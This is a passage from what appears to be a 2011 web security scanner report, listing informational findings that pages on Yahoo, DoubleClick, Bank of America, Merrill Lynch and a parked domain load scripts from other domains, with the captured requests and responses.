User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=8khj7j56qmjsh&b=3&s=7r; F=a=I9dRHdwMvTUKaBDhiVaH.UVtn.V7Y30KdDQIYBG7obdok_NZIfFNBlUZT4rlwq78V5tRt3I-&b=WFvT; YLS=v=1&p=1&n=9

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 13:55:05 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: ysf=e8hh476F5xfram8esL9uYMWUer4zVxwF9yCpDgtNY8OnYb8LD_SWa8_QLi9Zf_nIYdYzjXelUkLDzTd5b41mR1CxNhgLDeJHDzqdTA_eLB7_NzCP6Wp5J1nax6Fl7C53FlKTK3X2PDvsCY9f.C1X.bicPXpRyIP_cyXm9eGIvbxyykLRurMSQU0VWvd3X.Tvtb1_oT5ZxXajuPqdaGAOb.b4OXS02AtBEoLtP8RSAc2QL5O1mGGB9hINfdet0aGd3veAMcHbDG7KEhy9HwTlfx0IL8zE_mS3HW73sFhGOULomyXVqu3GnA4nTOqCY5E7M9MNb5RaoFPByjFgTjNrs8iFjmWFIq4uMdc5dBmcxooGV6f6fzOs87bsA3pt9yGcct.ODumZ3Gkqhu0IB.Pzes_Ys1kYrxNgn55_ms6pdomDxWcr08BuLVK.NLAlaPN3LdWDDu54bs9YvnuaK5ueLURN; expires=Thu, 26-Apr-2012 13:55:05 GMT; path=/; domain=.yahoo.com; secure; httponly
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 154354

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<META name="y_key" content="f760cc789e48a3df" />
<META name="google-site-verificati
...[SNIP]...
<meta name="title" content="Free Software Download Shareware Freeware - Downloads.Yahoo.com" />
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&amp;2.8.1/build/carousel/carousel-min.js&amp;2.8.1/build/yahoo-dom-event/yahoo-dom-event.js&amp;2.8.1/build/animation/animation-min.js&amp;2.8.1/build/container/container_core-min.js&amp;2.8.1/build/selector/selector-min.js&amp;2.8.1/build/button/button-min.js&amp;2.8.1/build/menu/menu-min.js&amp;2.8.1/build/element/element-min.js&amp;2.8.1/build/container/container-min.js"></script>
<script type="text/javascript" src="http://p.yimg.com/dp/dyc/js/downloads_min_0.0.9.js"></script>
...[SNIP]...
</div><script charset="utf-8" type="text/javascript" src="http://l.yimg.com/a/lib/uh/15/js/uh_rsa-1.0.9.js"></script>
...[SNIP]...

21.12. http://downloads.yahoo.com/windows/desktop-enhancements/virtual-desktop  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://downloads.yahoo.com
Path:   /windows/desktop-enhancements/virtual-desktop

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /windows/desktop-enhancements/virtual-desktop HTTP/1.1
Host: downloads.yahoo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=8khj7j56qmjsh&b=3&s=7r; F=a=I9dRHdwMvTUKaBDhiVaH.UVtn.V7Y30KdDQIYBG7obdok_NZIfFNBlUZT4rlwq78V5tRt3I-&b=WFvT; YLS=v=1&p=1&n=9; __utmz=143065248.1303826118.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=143065248.1215139530.1303826118.1303826118.1303826118.1; __utmc=143065248; __utmb=143065248.5.10.1303826118

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 13:56:18 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: ysf=gBH90to.5hf7Z2kPHVVBWT1SOsqA8znkBbhwDbdVtTDNQAnUJ2JU5sMkJoYkXjmm_JAUl0ncpuz70YW7mPjqrr5ij5IC87ycWrraNhzHrC2mTAo.wRnQRi_I2woD3u.f2KbfAH6kMJ3XcTVHbVH9MJO4JykNFL9_jvpCHC34w7ty0OXi4Pw6P1ZtfyiA2rqgVsOo9IS7gEGiiSUxMD5CsPVXKF0Er3.lwl5Vd.1HOfASbde9T7jw1q8ResrnweLIeYCAGyZx6o_IWDaZWAQu45KA.hCdcHthT46btDCeIczGSVK_3rdHcFP1SFrSHLiGSY8AfZyVZLpx3nwHu7IRdhT3coNoydg1kwsAK3uxvwmeQRPkbb4sA8_dGwNKGZvyckTkFHTUrXLQginUrM3tywEckcOI2Ou9oGcFNlOIGnh2m4yIZiLq3dDdRMkuNCmd_55TO55HJyjRYEm3ssZ2jLUS; expires=Thu, 26-Apr-2012 13:56:18 GMT; path=/; domain=.yahoo.com; secure; httponly
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 305086

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<META name="y_key" content="f760cc789e48a3df" />
<META name="google-site-verificati
...[SNIP]...
<meta name="description" content="Find all the latest Desktop Enhancements downloads from the best software downloads site - download Virtual desktop titles from Yahoo! Downloads" />
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&amp;2.8.1/build/carousel/carousel-min.js&amp;2.8.1/build/yahoo-dom-event/yahoo-dom-event.js&amp;2.8.1/build/animation/animation-min.js&amp;2.8.1/build/container/container_core-min.js&amp;2.8.1/build/selector/selector-min.js&amp;2.8.1/build/button/button-min.js&amp;2.8.1/build/menu/menu-min.js&amp;2.8.1/build/element/element-min.js&amp;2.8.1/build/container/container-min.js"></script>
<script type="text/javascript" src="http://p.yimg.com/dp/dyc/js/downloads_min_0.0.9.js"></script>
...[SNIP]...
</div><script charset="utf-8" type="text/javascript" src="http://l.yimg.com/a/lib/uh/15/js/uh_rsa-1.0.9.js"></script>
...[SNIP]...

21.13. http://downloads.yahoo.com/windows/is-it/security/anti-virus-scanners/avg-anti-virus-free-edition/42305  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://downloads.yahoo.com
Path:   /windows/is-it/security/anti-virus-scanners/avg-anti-virus-free-edition/42305

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /windows/is-it/security/anti-virus-scanners/avg-anti-virus-free-edition/42305 HTTP/1.1
Host: downloads.yahoo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=8khj7j56qmjsh&b=3&s=7r; F=a=I9dRHdwMvTUKaBDhiVaH.UVtn.V7Y30KdDQIYBG7obdok_NZIfFNBlUZT4rlwq78V5tRt3I-&b=WFvT; YLS=v=1&p=1&n=9; __utmz=143065248.1303826118.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=143065248.1215139530.1303826118.1303826118.1303826118.1; __utmc=143065248; __utmb=143065248.1.10.1303826118

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 13:56:08 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: ysf=xVd8BADE5xeANwBRYs5oLZOqg_4FZ6HdmpnP3mHJAK3o2rISGx9ISMjk9GKvcBYbrrAA2bDOHJ2MuK3IeVbHlBzoAS.smgIM3E6AVQQ5HGJIhLNu3IGyDfk5N.MvvnFmturIItI.TPOWyGkz9WnhF48GR79QpvqhRWFqwNP4lhdypwAsUqzy.epYzOkReKuzzAE6iVg75mlNK9L5yANHq2dI8uLRAr7WWG9Na.K__YtTRaZvZZ2r.B6gSTAygzYEueDTAy_34EUBdSTpnwgRDwM7EpBWx_BJL1B6_kPaZtES26xDZrRpq18313VM42HISJCsoKFnWDCcWGvIj9Z7EsIHQFaRktpA1DcyxuGrPZDo2jpM7MARGDfNaq17ifUVw9jfHnIhc3T2iPuHjTn6X0RP8GSV.fh1inGa5m24wd3NjtQJYVOxYZIMYnk.70uWmLX2Lg6jF3Q5XVVWfYwHDf7j; expires=Thu, 26-Apr-2012 13:56:08 GMT; path=/; domain=.yahoo.com; secure; httponly
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 257732

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<META name="y_key" content="f760cc789e48a3df" />
<META name="google-site-verificati
...[SNIP]...
et the latest AVG Anti-Virus Free Edition Genuine and Verified for your Windows. Search and download more Security softwares for Anti-Virus scanners from IS/IT section on Yahoo! Downloads." />
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&amp;2.8.1/build/carousel/carousel-min.js&amp;2.8.1/build/yahoo-dom-event/yahoo-dom-event.js&amp;2.8.1/build/animation/animation-min.js&amp;2.8.1/build/container/container_core-min.js&amp;2.8.1/build/selector/selector-min.js&amp;2.8.1/build/button/button-min.js&amp;2.8.1/build/menu/menu-min.js&amp;2.8.1/build/element/element-min.js&amp;2.8.1/build/container/container-min.js"></script>
<script type="text/javascript" src="http://p.yimg.com/dp/dyc/js/downloads_min_0.0.9.js"></script>
...[SNIP]...
</div><script charset="utf-8" type="text/javascript" src="http://l.yimg.com/a/lib/uh/15/js/uh_rsa-1.0.9.js"></script>
...[SNIP]...

21.14. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pagead/ads?client=ca-pub-5253809430940410&output=html&h=600&slotname=1644788465&w=120&lmt=1303845665&flash=10.2.154&url=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html&dt=1303827665898&bpp=8&shv=r20110420&jsv=r20110415&prev_slotnames=8319948044%2C1020003104%2C9565114904%2C0023118579&correlator=1303827663964&frm=0&adk=222637912&ga_vid=902403751.1303827664&ga_sid=1303827664&ga_hid=1845423620&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=965&bih=956&fu=0&ifi=5&dtd=13&xpc=gvNjmv27ZD&p=http%3A//www.spamlaws.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 26 Apr 2011 14:20:57 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 1722

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script src="http://ib.adnxs.com/ab?enc=pHA9CtcjE0CkcD0K1yMTQBLaci7FlQBApHA9CtcjE0CkcD0K1yMTQFUcOaKahDtdSsYda6b2ziXJ1LZNAAAAAEQwAAC1AAAAlgIAAAIAAADEpAIA0WMAAAEAAABVU0QAVVNEAHgAWAJhDE0AAg0BAgUCAAQAAAAAcx9FGwAAAAA.&tt_code=vert-314&udj=uf%28%27a%27%2C+9797%2C+1303827657%29%3Buf%28%27c%27%2C+52368%2C+1303827657%29%3Buf%28%27r%27%2C+173252%2C+1303827657%29%3Bppv%288991%2C+%276718109068834708565%27%2C+1303827657%2C+1303870857%2C+52368%2C+25553%29%3B&cnd=!uA56ZAiQmQMQxMkKGAAg0ccBKE0xMzMzEdcjE0BCCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABY4RhgAGiWBQ..&referrer=http://www.spamlaws.com/spam-blocker.html&pp=TbbUyQAERXEK7FrIESl1USKqAlzx_1NgCAINaw&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBOnjTydS2TfGKEci1sQfR6qWJAdfq-NMBp5-U7Bjrwu3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi01MjUzODA5NDMwOTQwNDEwoAHD8v3sA7IBEHd3dy5zcGFtbGF3cy5jb226AQoxMjB4NjAwX2FzyAEJ2gEpaHR0cDovL3d3dy5zcGFtbGF3cy5jb20vc3BhbS1ibG9ja2VyLmh0bWyYAsobwAIEyAKF0s8KqAMB6AO6AugDigP1AwAAAMSABrqkhf7K9qWnTw%26num%3D1%26sig%3DAGiWqtyey6ImO1eOpu-MUOoG2tgmoZ9VPg%26client%3Dca-pub-5253809430940410%26adurl%3D"></script>
...[SNIP]...

21.15. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303801106&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F25%2Fdork%2Flearnbridgefrontcom%2Fdom-based-xss-cross-site-scripting-capec86-cwe-79-dork-ghdb-report-example-poc.html&dt=1303783143017&bpp=6&shv=r20110420&jsv=r20110415&correlator=1303783143025&frm=0&adk=1607234649&ga_vid=2091087362.1303783143&ga_sid=1303783143&ga_hid=1637931588&ga_fc=0&u_tz=-300&u_his=8&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=907&bih=928&fu=0&ifi=1&dtd=17&xpc=5bvonzgYDQ&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 26 Apr 2011 01:58:53 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12742

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

21.16. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303800256&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F25%2Fdork%2Freflected-xss-cross-site-scripting-cwe79-capec86-ghdb-wwwgenbookcom.htm&dt=1303782297447&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303782297498&frm=0&adk=1819763764&ga_vid=190606745.1303782298&ga_sid=1303782298&ga_hid=647492866&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=907&bih=928&fu=0&ifi=1&dtd=151&xpc=ZxjtlC7jU7&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 26 Apr 2011 01:44:48 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4307

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

21.17. http://learn.bankofamerica.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://learn.bankofamerica.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: learn.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:40:03 GMT
Server: Apache
Set-Cookie: JSESSIONID=56BC742EBE04D7AB3A04E71C60FEF0B1; Path=/
Content-Language: en-US
Age: 122
Content-Length: 19092
Keep-Alive: timeout=2, max=286
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Set-Cookie: NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Tue, 26-Apr-2011 13:40:05 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en-US"><head><title>Personal F
...[SNIP]...
</script><script src="http://amch.questionmarket.com/adsc/d881014/2/881249/randm.js" type="text/javascript">//</script>
...[SNIP]...
<meta content="w_aPC7FY1aXXQNDVNWnsN5fw6TKKB9XIUhqNJ76oAdE" name="google-site-verification" /><script type="text/javascript" src="http://amch.questionmarket.com/adsc/d669226/4/669523/randm.js">//</script><script src="http://amch.questionmarket.com/adsc/d775669/2/776033/randm.js" type="text/javascript">//</script>
...[SNIP]...
<!-- dl exposed: H1 Mar-2011 -->
<script type="text/javascript" src="http://amch.questionmarket.com/adsc/d881014/3/881250/randm.js">//</script>
...[SNIP]...
<img border="0" width="1" height="1" class="offPage" src="http://amch.questionmarket.com/adsc/d698741/4/698763/adscout.php?ord=[randnum]" /><script src="http://amch.questionmarket.com/adsc/d775669/3/776034/randm.js" type="text/javascript">//</script>
...[SNIP]...

21.18. https://login.yahoo.com/config/login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.yahoo.com
Path:   /config/login

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /config/login?.done=http://downloads.yahoo.com%2findex.php&.src=ydl&.intl=us HTTP/1.1
Host: login.yahoo.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=8khj7j56qmjsh&b=3&s=7r; F=a=I9dRHdwMvTUKaBDhiVaH.UVtn.V7Y30KdDQIYBG7obdok_NZIfFNBlUZT4rlwq78V5tRt3I-&b=WFvT; YLS=v=1&p=1&n=9; ysf=08QxMuCE5xcRp6XxvP9UqQQVFjUnPTRIkxcDabYECLHYlgjWjedO.aMI9RGj2l09q.GrzSj0ZGNpKWL4tC5RhhHyRxFHPlU.kFCMEd44rNZiy50Es8NrBu7yXU0mNtf0YtrWeEjpo31kxbqrG0YGBvIbxraTXVC9nbjUpNtv9aXJppMZot2l11h5_ZSFAPhtqxX_6SVAEVGb0NKTjuEX9ZYv2zDAxiWP9cGTqFS0cy9sv336lSqBJx7SukerpgGajbVm5ixswV527gxjaF3uyCr7m1vg_4ERgH_kHGmM1GC3lZg7kpdA4se.Qgpe8f7RJkYS8crdx364dtmP6Js16W8_gxE1rMXJs1u9F8J4fm3eQRNc_54_vpkaiaTqfiqOcFZODhj_ghb_GOxG1FWZmW.i2zsaspuKA4yive5ZswfNSY0PlT8WhNaRhUIxTsKui8a4VYdjdz.5HLTMtIko4yhA

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 13:55:23 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
X-Frame-Options: DENY
Cache-Control: private
Connection: close
Content-Type: text/html
Content-Length: 42663


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Sign in
...[SNIP]...
</script>
<script type="text/javascript" src="https://s.yimg.com/lq/lib/reg/js/yahoo_dom_event_animation_connection_2.8.2_inc_superads_capslock_loginmd5_min_12.js"></script>
...[SNIP]...

21.19. http://nuclearpesticide.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nuclearpesticide.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /?epl=6uDg8f0GtTBB04c13Nw5Y2TAIUmQUDhFchd_0fciLHGkFRPIpi8gG4Jpix0wCcvzJ5qDEQahgZLFrI5CphQZUysHDq10em_RGphrcn6kQE3JISFcR16KixcH4xgxowJDrvsks3GX6v1OBwDUozbUpqZpU08RlOkB1IZMbTLURhF1ACAQ3ue_AADgfwUAAECA2wgAAGTAIUlZUyZZQTE2aFpChgAAAPA HTTP/1.1
Host: nuclearpesticide.com
Proxy-Connection: keep-alive
Referer: http://nuclearpesticide.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: parkinglot=1

Response

HTTP/1.0 200 (OK)
Cache-Control: private, no-cache, must-revalidate
Pragma: no-cache
Server: Oversee Turing v1.0.0
Content-Type: text/html
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://www.dsnextgen.com/w3c/p3p.xml", CP="NOI DSP COR ADMa OUR NOR STA"
Set-Cookie: nuclearpesticide.com=search%3A0%7Cexitpop%3A0%7Clload%3A0%7Clvisit%3A1303825549%7Cclick%3A0%7Cblocked%3A0; path=/; expires=Wed, 27-Apr-2011 13:45:49 GMT
Set-Cookie: ident=search%3A0%7Cexitpop%3A0%7Clload%3A0%7Clvisit%3A1303825549%7Cclick%3A0%7Cblocked%3A0%7Ctoken%3Ayszswytswwytqwwv; path=/; expires=Wed, 27-Apr-2011 13:45:49 GMT
Set-Cookie: Spusr=a0015ac53514db6cc8d1a44; path=/; expires=Thu, 25-Apr-2013 13:45:49 GMT
Connection: Keep-Alive
Content-Length: 52421

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<!-- turing_cluster_prod -->
<html>
<head> <title> nuclearpesticide.com </title>
<meta http-equiv="Keywords
...[SNIP]...
</style>
<SCRIPT TYPE="text/javascript" SRC="http://adserving.cpxadroit.com/tags2/4-1005620.js"></SCRIPT>
...[SNIP]...
</script> <script type="text/javascript" src="http://p.chango.com/p.js"></script>
...[SNIP]...

21.20. https://olui2.fs.ml.com/login/login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://olui2.fs.ml.com
Path:   /login/login.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /login/login.aspx?sgt=3&_tps=53e1d1d2ef5543dabbbb6e0d12a34f8b HTTP/1.1
Host: olui2.fs.ml.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:28:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
geh-svr-hex: 65680608
Set-Cookie: Bear=lOEt4KgcVyTNtOFnrwpDlr8rCGj6G8KxVhb/yhftyUA=; domain=.fs.ml.com; path=/
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 89522


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" >
<head lang="en-us"><met
...[SNIP]...
</script>

<script src="https://scripts-olui.akamai-cdn.com/sve/js/ms/Microsoft_min_1.0.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script src="https://scripts-olui.akamai-cdn.com/sve/js/GL/Global.js" type="text/javascript"></script>
<script src="https://scripts-olui.akamai-cdn.com/sve/js/GL/PlatformInstrumentation.js" type="text/javascript"></script>
<script src="https://scripts-olui.akamai-cdn.com/sve/js/JQ/jquery-1.3.2.js" type="text/javascript"></script>
<script src="https://scripts-olui.akamai-cdn.com/sve/js/gl/pixy_chat.js" type="text/javascript"></script>
